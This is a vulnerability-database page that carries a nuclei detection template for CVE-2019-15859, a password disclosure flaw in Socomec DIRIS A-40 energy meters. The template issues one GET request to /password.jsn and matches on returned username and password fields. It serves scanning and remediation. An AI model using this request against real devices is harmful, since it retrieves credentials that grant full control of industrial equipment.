Lucene search
K

Socomec DIRIS A-40 Devices Password Disclosure

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Socomec DIRIS A-40 Devices Password Disclosure, vulnerability in web interface allowing remote acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Socomec DIRIS A-40 Password Disclosure Vulnerability
14 Oct 201900:00
cnvd
CVE
CVE-2019-15859
9 Oct 201915:04
cve
Cvelist
CVE-2019-15859
9 Oct 201915:04
cvelist
NVD
CVE-2019-15859
9 Oct 201916:15
nvd
OSV
CVE-2019-15859
9 Oct 201916:15
osv
Packet Storm
Socomec DIRIS A-40 Password Disclosure
8 Oct 201900:00
packetstorm
Prion
Cross site scripting
9 Oct 201916:15
prion
RedhatCVE
CVE-2019-15859
22 May 202504:37
redhatcve
id: CVE-2019-15859

info:
  name: Socomec DIRIS A-40 Devices Password Disclosure
  author: geeknik
  severity: critical
  description: Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.
  impact: |
    An attacker can obtain sensitive information such as passwords, leading to unauthorized access.
  remediation: |
    Update the firmware of the Socomec DIRIS A-40 devices to the latest version to mitigate the vulnerability.
  reference:
    - https://seclists.org/fulldisclosure/2019/Oct/10
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15859
    - http://packetstormsecurity.com/files/154764/Socomec-DIRIS-A-40-Password-Disclosure.html
    - https://www.socomec.com/single-circuit-multifunction-meters_en.html
    - http://seclists.org/fulldisclosure/2019/Oct/10
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-15859
    cwe-id: CWE-200
    epss-score: 0.34113
    epss-percentile: 0.98197
    cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: socomec
    product: diris_a-40_firmware
  tags: cve,cve2019,seclists,packetstorm,disclosure,socomec,diris,iot,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/password.jsn"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/json"

      - type: word
        part: body
        words:
          - "username"
          - "password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cf1b335f9855ca25d7126e09eb9a526695f2a813a151af9df81ff90afd8e6de2022061593d2b5b3f9e313956a67cf26b726d223e6335eed3bd530f165b23d3cebeb1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
CVSS 210
EPSS0.34113
31